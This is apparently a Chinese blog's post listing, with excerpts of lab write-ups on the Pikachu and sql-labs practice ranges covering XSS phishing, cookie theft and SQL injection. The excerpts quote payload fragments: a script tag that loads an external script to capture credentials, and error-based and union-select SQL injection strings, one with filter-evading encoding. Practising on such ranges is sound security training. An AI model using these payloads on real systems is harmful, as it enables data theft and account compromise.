自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(5)
  • 收藏
  • 关注

原创 Pikachu 靶场钓鱼攻击

找到配置文件修改为自己后台管理的 IP 地址注意箭头前有空格记得删除。插入 Payload:'"><script src="打开黑客发送的网址会弹出输入账号密码。已经成功获取到账户密码了。

2024-10-09 14:15:58 348

原创 Pikachu 靶场盗取 Cookie

注:如果在实际攻击中并不是在受害者端插入 Payload,而是在黑客端插入 Payload 后将网页发送给受害者,让受害者进行访问,这里只是实验。注:在实际攻击中将此 IP 地址修改为黑客端 IP 地址即可(因为我们要诱骗用户访问我们的网页)将配置文件重定向为被害者的 IP 地址(这样设置后会让受害者点击网页时重定向到指定网页)将 Pikachu 文件下的pkxss 复制到 WWW 目录下,确保后台管理安装成功。这里在受害者端搭建了 Pikachu。成功登录后台管理工具。

2024-10-09 13:48:35 317

原创 Sql-labs 靶场(46-53)

目录第 46 关第 47 关第 48 关第 49 关第 50-53 关本关使用的是 order by 排序不同于where后面的注入,它不可以使用union联合查询注入,但可以用盲注、时间、报错等函数进行注入① 判断闭合符不管输入字符型什么闭合符都报错,然后使用数值 1=1、1=2 都不报错 进一步判断② 判断数据库在进行获取数据库时分别使用了字符型和数字型最后发现是数字型http://127.0.0.1/sql/Less-46/?sort=1 and updatexml(1,concat(2,(selec

2024-09-24 17:23:59 620

原创 Sql-labs 靶场(20-30)

语法:http://127.0.0.1/sql/Less-26/?id=0')%a0UniOn%a0SeleCt%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'%a0or('语法:http://127.0.0.1/sql/Less-27/?

2024-09-24 07:41:07 692

原创 Pikachu靶场-SQL注入

语法:User-Agent: 1' and updatexml(1,concat(2,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='pikachu')),3) or ' 1=1。

2024-09-20 14:54:46 2143

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除